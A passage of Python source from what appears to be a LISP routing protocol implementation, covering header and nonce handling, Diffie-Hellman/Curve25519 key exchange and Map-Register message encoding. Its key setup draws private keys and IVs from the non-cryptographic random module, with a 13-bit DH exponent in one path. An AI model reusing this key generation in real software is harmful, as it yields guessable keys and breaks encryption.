second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
class lisp_echo_nonce(object):
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%E%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def receive_request(self, ipc_socket, nonce):
old_nonce = self.request_nonce_rcvd
self.request_nonce_rcvd = nonce
self.last_request_nonce_rcvd = lisp_get_timestamp()
if (lisp_i_am_rtr): return
if (old_nonce != nonce): self.send_request_ipc(ipc_socket, nonce)
#enddef
def receive_echo(self, ipc_socket, nonce):
if (self.request_nonce_sent != nonce): return
self.last_echo_nonce_rcvd = lisp_get_timestamp()
if (self.echo_nonce_rcvd == nonce): return
self.echo_nonce_rcvd = nonce
if (lisp_i_am_rtr): return
self.send_echo_ipc(ipc_socket, nonce)
#enddef
def get_request_or_echo_nonce(self, ipc_socket, remote_rloc):
#
# If we are in both request-nonce and echo-nonce mode, let the
# higher IP addressed RLOC be in request mode.
#
if (self.request_nonce_sent and self.echo_nonce_sent and remote_rloc):
local_rloc = lisp_myrlocs[0] if remote_rloc.is_ipv4() \
else lisp_myrlocs[1]
if (remote_rloc.address > local_rloc.address):
a = "exit"
self.request_nonce_sent = None
else:
a = "stay in"
self.echo_nonce_sent = None
#endif
c = bold("collision", False)
l = red(local_rloc.print_address_no_iid(), False)
r = red(remote_rloc.print_address_no_iid(), False)
lprint("Echo nonce {}, {} -> {}, {} request-nonce mode".format(c,
l, r, a))
#endif
#
# If we are echoing, return echo-nonce. Or get out of echo-nonce mode.
#
if (self.echo_nonce_sent != None):
nonce = self.echo_nonce_sent
e = bold("Echoing", False)
lprint("{} nonce 0x{} to {}".format(e,
lisp_hex_string(nonce), red(self.rloc_str, False)))
self.last_echo_nonce_sent = lisp_get_timestamp()
self.echo_nonce_sent = None
return(nonce)
#endif
#endif
#
# Should we stop requesting nonce-echoing? Only do so if we received
# a echo response and some time (10 seconds) has past.
#
nonce = self.request_nonce_sent
last = self.last_request_nonce_sent
if (nonce and last != None):
if (time.time() - last >= LISP_NONCE_ECHO_INTERVAL):
self.request_nonce_sent = None
lprint("Stop request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
return(None)
#endif
#endif
#
# Start echoing the nonce. Get a new nonce. If a echo-nonce is stored
# use the same nonce as last time regardless if we received an echo
# response. High-order bit set is telling caller to set the e-bit in
# header.
#
if (nonce == None):
nonce = lisp_get_data_nonce()
if (self.recently_requested()): return(nonce)
self.request_nonce_sent = nonce
lprint("Start request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
self.last_new_request_nonce_sent = lisp_get_timestamp()
#
# Send the request-nonce to the ETR so it can tell us when the
# other side has echoed this request-nonce.
#
if (lisp_i_am_itr == False): return(nonce | 0x80000000)
self.send_request_ipc(ipc_socket, nonce)
else:
lprint("Continue request-nonce mode for {}, nonce 0x{}".format( \
red(self.rloc_str, False), lisp_hex_string(nonce)))
#endif
#
# Continue sending request-nonce. But if we never received an echo,
# don't update timer.
#
self.last_request_nonce_sent = lisp_get_timestamp()
return(nonce | 0x80000000)
#enddef
def request_nonce_timeout(self):
if (self.request_nonce_sent == None): return(False)
if (self.request_nonce_sent == self.echo_nonce_rcvd): return(False)
elapsed = time.time() - self.last_request_nonce_sent
last_resp = self.last_echo_nonce_rcvd
return(elapsed >= LISP_NONCE_ECHO_INTERVAL and last_resp == None)
#enddef
def recently_requested(self):
last_resp = self.last_request_nonce_sent
if (last_resp == None): return(False)
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def recently_echoed(self):
if (self.request_nonce_sent == None): return(True)
#
# Check how long its been since last received echo.
#
last_resp = self.last_good_echo_nonce_rcvd
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
if (elapsed <= LISP_NONCE_ECHO_INTERVAL): return(True)
#
# If last received echo was a while ago and a new request-nonce was
# sent recently, say the echo happen so we can bootstrap a new request
# and echo exchange.
#
last_resp = self.last_new_request_nonce_sent
if (last_resp == None): last_resp = 0
elapsed = time.time() - last_resp
return(elapsed <= LISP_NONCE_ECHO_INTERVAL)
#enddef
def change_state(self, rloc):
if (rloc.up_state() and self.recently_echoed() == False):
down = bold("down", False)
good_echo = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
lprint("Take {} {}, last good echo: {}".format( \
red(self.rloc_str, False), down, good_echo))
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
return
#endif
if (rloc.no_echoed_nonce_state() == False): return
if (self.recently_requested() == False):
up = bold("up", False)
lprint("Bring {} {}, retry request-nonce mode".format( \
red(self.rloc_str, False), up))
rloc.state = LISP_RLOC_UP_STATE
rloc.last_state_change = lisp_get_timestamp()
#endif
#enddef
def print_echo_nonce(self):
rs = lisp_print_elapsed(self.last_request_nonce_sent)
er = lisp_print_elapsed(self.last_good_echo_nonce_rcvd)
es = lisp_print_elapsed(self.last_echo_nonce_sent)
rr = lisp_print_elapsed(self.last_request_nonce_rcvd)
s = space(4)
output = "Nonce-Echoing:\n"
output += ("{}Last request-nonce sent: {}\n{}Last echo-nonce " + \
"received: {}\n").format(s, rs, s, er)
output += ("{}Last request-nonce received: {}\n{}Last echo-nonce " + \
"sent: {}").format(s, rr, s, es)
return(output)
#enddef
#endclass
#
# lisp_keys
#
# Class to hold Diffie-Hellman keys. For ECDH use RFC5114 gx value of
# "192-bit Random ECP Group".
#
class lisp_keys(object):
def __init__(self, key_id, do_curve=True, do_chacha=use_chacha,
do_poly=use_poly):
self.uptime = lisp_get_timestamp()
self.last_rekey = None
self.rekey_count = 0
self.use_count = 0
self.key_id = key_id
self.cipher_suite = LISP_CS_1024
self.dh_g_value = LISP_CS_1024_G
self.dh_p_value = LISP_CS_1024_P
self.curve25519 = None
self.cipher_suite_string = ""
if (do_curve):
if (do_chacha):
self.cipher_suite = LISP_CS_25519_CHACHA
self.cipher_suite_string = "chacha"
elif (os.getenv("LISP_USE_AES_GCM") != None):
self.cipher_suite = LISP_CS_25519_GCM
self.cipher_suite_string = "aes-gcm"
else:
self.cipher_suite = LISP_CS_25519_CBC
self.cipher_suite_string = "aes-cbc"
#endif
self.local_private_key = random.randint(0, 2**128-1)
key = lisp_hex_string(self.local_private_key).zfill(32)
self.curve25519 = curve25519.Private(key.encode())
else:
self.local_private_key = random.randint(0, 0x1fff)
#endif
self.local_public_key = self.compute_public_key()
self.remote_public_key = None
self.shared_key = None
self.encrypt_key = None
self.icv_key = None
self.icv = poly1305 if do_poly else hashlib.sha256
self.iv = None
self.get_iv()
self.do_poly = do_poly
#enddef
def copy_keypair(self, key):
self.local_private_key = key.local_private_key
self.local_public_key = key.local_public_key
self.curve25519 = key.curve25519
#enddef
def get_iv(self):
if (self.iv == None):
self.iv = random.randint(0, LISP_16_128_MASK)
else:
self.iv += 1
#endif
iv = self.iv
if (self.cipher_suite == LISP_CS_25519_CHACHA):
iv = struct.pack("Q", iv & LISP_8_64_MASK)
elif (self.cipher_suite == LISP_CS_25519_GCM):
ivh = struct.pack("I", (iv >> 64) & LISP_4_32_MASK)
ivl = struct.pack("Q", iv & LISP_8_64_MASK)
iv = ivh + ivl
else:
iv = struct.pack("QQ", iv >> 64, iv & LISP_8_64_MASK)
return(iv)
#enddef
def key_length(self, key):
if (isinstance(key, int)): key = self.normalize_pub_key(key)
return(old_div(len(key), 2))
#enddef
def print_key(self, key):
k = self.normalize_pub_key(key)
top = k[0:4].decode()
bot = k[-4::].decode()
return("0x{}...{}({})".format(top, bot, self.key_length(k)))
#enddef
def normalize_pub_key(self, key):
if (isinstance(key, int)):
key = lisp_hex_string(key).zfill(256)
return(key)
#endif
if (self.curve25519): return(binascii.hexlify(key))
return(key)
#enddef
def print_keys(self, do_bold=True):
l = bold("local-key: ", False) if do_bold else "local-key: "
if (self.local_public_key == None):
l += "none"
else:
l += self.print_key(self.local_public_key)
#endif
r = bold("remote-key: ", False) if do_bold else "remote-key: "
if (self.remote_public_key == None):
r += "none"
else:
r += self.print_key(self.remote_public_key)
#endif
dh = "ECDH" if (self.curve25519) else "DH"
cs = self.cipher_suite
return("{} cipher-suite: {}, {}, {}".format(dh, cs, l, r))
#enddef
def compare_keys(self, keys):
if (self.dh_g_value != keys.dh_g_value): return(False)
if (self.dh_p_value != keys.dh_p_value): return(False)
if (self.remote_public_key != keys.remote_public_key): return(False)
return(True)
#enddef
def compute_public_key(self):
if (self.curve25519): return(self.curve25519.get_public().public)
key = self.local_private_key
g = self.dh_g_value
p = self.dh_p_value
return(int((g**key) % p))
#enddef
def compute_shared_key(self, ed, print_shared=False):
key = self.local_private_key
remote_key = self.remote_public_key
compute = bold("Compute {} shared-key".format(ed), False)
lprint("{}, key-material: {}".format(compute, self.print_keys()))
if (self.curve25519):
public = curve25519.Public(remote_key)
self.shared_key = self.curve25519.get_shared_key(public)
else:
p = self.dh_p_value
self.shared_key = (remote_key**key) % p
#endif
#
# This should only be used in a lab for debugging and never live since
# its a security risk to expose the shared-key (even though the entire
# key is not displayed).
#
if (print_shared):
k = self.print_key(self.shared_key)
lprint("Computed shared-key: {}".format(k))
#endif
#
# Now compute keys we use for encryption and ICV authentication.
#
self.compute_encrypt_icv_keys()
#
# Increment counters and timestamp.
#
self.rekey_count += 1
self.last_rekey = lisp_get_timestamp()
#enddef
def compute_encrypt_icv_keys(self):
alg = hashlib.sha256
if (self.curve25519):
data = self.shared_key
else:
data = lisp_hex_string(self.shared_key)
#endif
#
# context = "0001" || "lisp-crypto" || "<lpub> xor <rpub>" || "0100"
#
l = self.local_public_key
if (type(l) != int): l = int(binascii.hexlify(l), 16)
r = self.remote_public_key
if (type(r) != int): r = int(binascii.hexlify(r), 16)
context = "0001" + "lisp-crypto" + lisp_hex_string(l ^ r) + "0100"
key_material = hmac.new(context.encode(), data, alg).hexdigest()
key_material = int(key_material, 16)
#
# key-material = key-material-1-encrypt || key-material-2-icv
#
ek = (key_material >> 128) & LISP_16_128_MASK
ik = key_material & LISP_16_128_MASK
ek = lisp_hex_string(ek).zfill(32)
self.encrypt_key = ek.encode()
fill = 32 if self.do_poly else 40
ik = lisp_hex_string(ik).zfill(fill)
self.icv_key = ik.encode()
#enddef
def do_icv(self, packet, nonce):
if (self.icv_key == None): return("")
if (self.do_poly):
poly = self.icv.poly1305aes
hexlify = self.icv.binascii.hexlify
nonce = hexlify(nonce)
hash_output = poly(self.encrypt_key, self.icv_key, nonce, packet)
if (lisp_is_python2()):
hash_output = hexlify(hash_output.encode("raw_unicode_escape"))
else:
hash_output = hexlify(hash_output).decode()
#endif
else:
key = binascii.unhexlify(self.icv_key)
hash_output = hmac.new(key, packet, self.icv).hexdigest()
hash_output = hash_output[0:40]
#endif
return(hash_output)
#enddef
def add_key_by_nonce(self, nonce):
if (nonce not in lisp_crypto_keys_by_nonce):
lisp_crypto_keys_by_nonce[nonce] = [None, None, None, None]
#endif
lisp_crypto_keys_by_nonce[nonce][self.key_id] = self
#enddef
def delete_key_by_nonce(self, nonce):
if (nonce not in lisp_crypto_keys_by_nonce): return
lisp_crypto_keys_by_nonce.pop(nonce)
#enddef
def add_key_by_rloc(self, addr_str, encap):
by_rlocs = lisp_crypto_keys_by_rloc_encap if encap else \
lisp_crypto_keys_by_rloc_decap
if (addr_str not in by_rlocs):
by_rlocs[addr_str] = [None, None, None, None]
#endif
by_rlocs[addr_str][self.key_id] = self
#
# If "ipc-data-plane = yes" is configured, we need to tell the data-
# plane from the lisp-etr process what the decryption key is.
#
if (encap == False):
lisp_write_ipc_decap_key(addr_str, by_rlocs[addr_str])
#endif
#enddef
def encode_lcaf(self, rloc_addr):
pub_key = self.normalize_pub_key(self.local_public_key)
key_len = self.key_length(pub_key)
sec_len = (6 + key_len + 2)
if (rloc_addr != None): sec_len += rloc_addr.addr_length()
packet = struct.pack("HBBBBHBB", socket.htons(LISP_AFI_LCAF), 0, 0,
LISP_LCAF_SECURITY_TYPE, 0, socket.htons(sec_len), 1, 0)
#
# Put in cipher suite value. Support 1024-bit keys only. Then insert
# key-length and public key material. Do not negotiate ECDH 25519
# cipher suite if library not installed on system.
#
cs = self.cipher_suite
packet += struct.pack("BBH", cs, 0, socket.htons(key_len))
#
# Insert public-key.
#
for i in range(0, key_len * 2, 16):
key = int(pub_key[i:i+16], 16)
packet += struct.pack("Q", byte_swap_64(key))
#endfor
#
# Insert RLOC address.
#
if (rloc_addr):
packet += struct.pack("H", socket.htons(rloc_addr.afi))
packet += rloc_addr.pack_address()
#endif
return(packet)
#enddef
def decode_lcaf(self, packet, lcaf_len):
#
# Called by lisp_map_request().
#
if (lcaf_len == 0):
packet_format = "HHBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, rsvd, lcaf_type, rsvd, lcaf_len = struct.unpack( \
packet_format, packet[:format_size])
if (lcaf_type != LISP_LCAF_SECURITY_TYPE):
packet = packet[lcaf_len + 6::]
return(packet)
#endif
lcaf_len = socket.ntohs(lcaf_len)
packet = packet[format_size::]
#endif
#
# Fall through or called by lisp_rloc_record() when lcaf_len is
# non-zero.
#
lcaf_type = LISP_LCAF_SECURITY_TYPE
packet_format = "BBBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
key_count, rsvd, cs, rsvd, key_len = struct.unpack(packet_format,
packet[:format_size])
#
# Advance packet pointer to beginning of key material. Validate there
# is enough packet to pull the key out according the encoded key
# length found earlier in the packet.
#
packet = packet[format_size::]
key_len = socket.ntohs(key_len)
if (len(packet) < key_len): return(None)
#
# Check Cipher Suites supported.
#
cs_list = [LISP_CS_25519_CBC, LISP_CS_25519_GCM, LISP_CS_25519_CHACHA,
LISP_CS_1024]
if (cs not in cs_list):
lprint("Cipher-suites {} supported, received {}".format(cs_list,
cs))
packet = packet[key_len::]
return(packet)
#endif
self.cipher_suite = cs
#
# Iterate to pull 8 bytes (64-bits) out at at time. The key is stored
# internally as an integer.
#
pub_key = 0
for i in range(0, key_len, 8):
key = byte_swap_64(struct.unpack("Q", packet[i:i+8])[0])
pub_key <<= 64
pub_key |= key
#endfor
self.remote_public_key = pub_key
#
# Convert to 32-byte binary string. Make sure leading 0s are included.
# ;-)
#
if (self.curve25519):
key = lisp_hex_string(self.remote_public_key)
key = key.zfill(64)
new_key = b""
for i in range(0, len(key), 2):
byte = int(key[i:i+2], 16)
new_key += lisp_store_byte(byte)
#endfor
self.remote_public_key = new_key
#endif
packet = packet[key_len::]
return(packet)
#enddef
#endclass
#
# lisp_store_byte
#
# We have to store a byte differently in a py2 string versus a py3 byte string.
# Check if the code was compiled with either python2 or python3.
#
def lisp_store_byte_py2(byte):
return(chr(byte))
#enddef
def lisp_store_byte_py3(byte):
return(bytes([byte]))
#enddef
lisp_store_byte = lisp_store_byte_py2
if (lisp_is_python3()): lisp_store_byte = lisp_store_byte_py3
#
# lisp_thread()
#
# Used to multi-thread the data-plane.
#
class lisp_thread(object):
def __init__(self, name):
self.thread_name = name
self.thread_number = -1
self.number_of_pcap_threads = 0
self.number_of_worker_threads = 0
self.input_queue = queue.Queue()
self.input_stats = lisp_stats()
self.lisp_packet = lisp_packet(None)
#enddef
#endclass
#------------------------------------------------------------------------------
#
# The LISP fixed control header:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=x | Reserved | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_control_header(object):
def __init__(self):
self.type = 0
self.record_count = 0
self.nonce = 0
self.rloc_probe = False
self.smr_bit = False
self.smr_invoked_bit = False
self.ddt_bit = False
self.to_etr = False
self.to_ms = False
self.info_reply = False
#enddef
def decode(self, packet):
packet_format = "BBBBQ"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
typeval, bits, reserved, self.record_count, self.nonce = \
struct.unpack(packet_format, packet[:format_size])
self.type = typeval >> 4
if (self.type == LISP_MAP_REQUEST):
self.smr_bit = True if (typeval & 0x01) else False
self.rloc_probe = True if (typeval & 0x02) else False
self.smr_invoked_bit = True if (bits & 0x40) else False
#endif
if (self.type == LISP_ECM):
self.ddt_bit = True if (typeval & 0x04) else False
self.to_etr = True if (typeval & 0x02) else False
self.to_ms = True if (typeval & 0x01) else False
#endif
if (self.type == LISP_NAT_INFO):
self.info_reply = True if (typeval & 0x08) else False
#endif
return(True)
#enddef
def is_info_request(self):
return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))
#enddef
def is_info_reply(self):
return(True if self.info_reply else False)
#enddef
def is_rloc_probe(self):
return(True if self.rloc_probe else False)
#enddef
def is_smr(self):
return(True if self.smr_bit else False)
#enddef
def is_smr_invoked(self):
return(True if self.smr_invoked_bit else False)
#enddef
def is_ddt(self):
return(True if self.ddt_bit else False)
#enddef
def is_to_etr(self):
return(True if self.to_etr else False)
#enddef
def is_to_ms(self):
return(True if self.to_ms else False)
#enddef
#endclass
#
# The Map-Register message format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=3 |P|S|I| Reserved | kid |e|F|T|a|m|M| Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Algorithm ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R | Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-Prefix-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-Prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# | |
# +- ... xTR router-ID ... -+
# | |
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# +- ... xTR site-ID ... -+
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# kid are 1 of 8 values that describe the encryption key-id used for
# encrypting Map-Register messages.When the Map-Register is encrypted, the
# entire message not including the first 4 bytes are chacha20 encrypted. The
# e-bit must be set by the ETR to indicate that the Map-Register was encrypted.
#
class lisp_map_register(object):
def __init__(self):
self.proxy_reply_requested = False
self.lisp_sec_present = False
self.xtr_id_present = False
self.map_notify_requested = False
self.mobile_node = False
self.merge_register_requested = False
self.use_ttl_for_timeout = False
self.map_register_refresh = False
self.record_count = 0
self.nonce = 0
self.alg_id = 0
self.key_id = 0
self.auth_len = 0
self.auth_data = 0
self.xtr_id = 0
self.site_id = 0
self.record_count = 0
self.sport = 0
self.encrypt_bit = 0
self.encryption_key_id = None
#enddef
def print_map_register(self):
xtr_id = lisp_hex_string(self.xtr_id)
line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
"{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
"0x{}, site-id: {}")
lprint(line.format(bold("Map-Register", False), \
"P" if self.proxy_reply_requested else "p",
"S" if self.lisp_sec_present else "s",
"I" if self.xtr_id_present else "i",
"T" if self.use_ttl_for_timeout else "t",
"R" if self.merge_register_requested else "r",
"M" if self.mobile_node else "m",
"N" if self.map_notify_requested else "n",
"F" if self.map_register_refresh else "f",
"E" if self.encrypt_bit else "e",
self.record_count, lisp_hex_string(self.nonce), self.key_id,
self.alg_id, " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) \
else (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else \
""), self.auth_len, xtr_id, self.site_id))
#enddef
def encode(self):
first_long = (LISP_MAP_REGISTER << 28) | self.record_count
if (self.proxy_reply_requested): first_long |= 0x08000000
if (self.lisp_sec_present): first_long |= 0x04000000
if (self.xtr_id_present): first_long |= 0x02000000
if (self.map_register_refresh): first_long |= 0x1000
if (self.use_ttl_for_timeout): first_long |= 0x800
if (self.merge_register_requested): first_long |= 0x400
if (self.mobile_node): first_long |= 0x200
if (self.map_notify_requested): first_long |= 0x100
if (self.encryption_key_id != None):
first_long |= 0x2000
first_long |= self.encryption_key_id << 14
#endif
#
# Append zeroed authentication data so we can compute hash latter.
#
if (self.alg_id == LISP_NONE_ALG_ID):
self.auth_len = 0
else:
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN
#endif
#endif
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
socket.htons(self.auth_len))
packet = self.zero_auth(packet)
return(packet)
#enddef
def zero_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_data = b""
auth_len = 0
if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
auth_data = struct.pack("QQI", 0, 0, 0)
auth_len = struct.calcsize("QQI")
#endif
if (self.alg_id == LISP_SHA_256_128_ALG_ID):
auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
auth_len = struct.calcsize("QQQQ")
#endif
packet = packet[0:offset] + auth_data + packet[offset+auth_len::]
return(packet)
#enddef
def encode_auth(self, packet):
offset = struct.calcsize("I") + struct.calcsize("QHH")
auth_len = self.auth_len
auth_data = self.auth_data
packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
packet = packet[format_size::]
packet_format = "QBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return([None, None])
self.nonce, self.key_id, self.alg_id, self.auth_len = \
struct.unpack(packet_format, packet[:format_size])
self.nonce = byte_swap_64(self.nonce)
self.auth_len = socket.ntohs(self.auth_len)
self.proxy_reply_requested = True if (first_long & 0x08000000) \
else False
self.lisp_sec_present = True if (first_long & 0x04000000) else False
self.xtr_id_present = True if (first_long & 0x02000000) else False
self.use_ttl_for_timeout = True if (first_long & 0x800) else False
self.map_register_refresh = True if (first_long & 0x1000) else False
self.merge_register_requested = True if (first_long & 0x400) else False
self.mobile_node = True if (first_long & 0x200) else False
self.map_notify_requested = True if (first_long & 0x100) else False
self.record_count = first_long & 0xff
#
# Decode e-bit and key-id for Map-Register decryption.
#
self.encrypt_bit = True if first_long & 0x2000 else False
if (self.encrypt_bit):
self.encryption_key_id = (first_long >> 14) & 0x7
#endif
#
# Decode xTR-ID and site-ID if sender set the xtr_id_present bit.
#
if (self.xtr_id_present):
if (self.decode_xtr_id(orig_packet) == False): return([None, None])
#endif
packet = packet[format_size::]
#
# Parse authentication and zero out the auth field in the packet.
#
if (self.auth_len != 0):
if (len(packet) < self.auth_len): return([None, None])
if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
LISP_SHA_256_128_ALG_ID)):
lprint("Invalid authentication alg-id: {}".format(self.alg_id))
return([None, None])
#endif
auth_len = self.auth_len
if (self.alg_id == LISP_SHA_1_96_ALG_ID):
format_size = struct.calcsize("QQI")
if (auth_len < format_size):
lprint("Invalid sha1-96 authentication length")
return([None, None])
#endif
auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
auth4 = b""
elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
format_size = struct.calcsize("QQQQ")
if (auth_len < format_size):
lprint("Invalid sha2-256 authentication length")
return([None, None])
#endif
auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
packet[:auth_len])
else:
lprint("Unsupported authentication alg-id value {}".format( \
self.alg_id))
return([None, None])
#endif
self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
auth3, auth4)
orig_packet = self.zero_auth(orig_packet)
packet = packet[self.auth_len::]
#endif
return([orig_packet, packet])
#enddef
def encode_xtr_id(self, packet):
xtr_id_upper = self.xtr_id >> 64
xtr_id_lower = self.xtr_id & 0xffffffffffffffff
xtr_id_upper = byte_swap_64(xtr_id_upper)
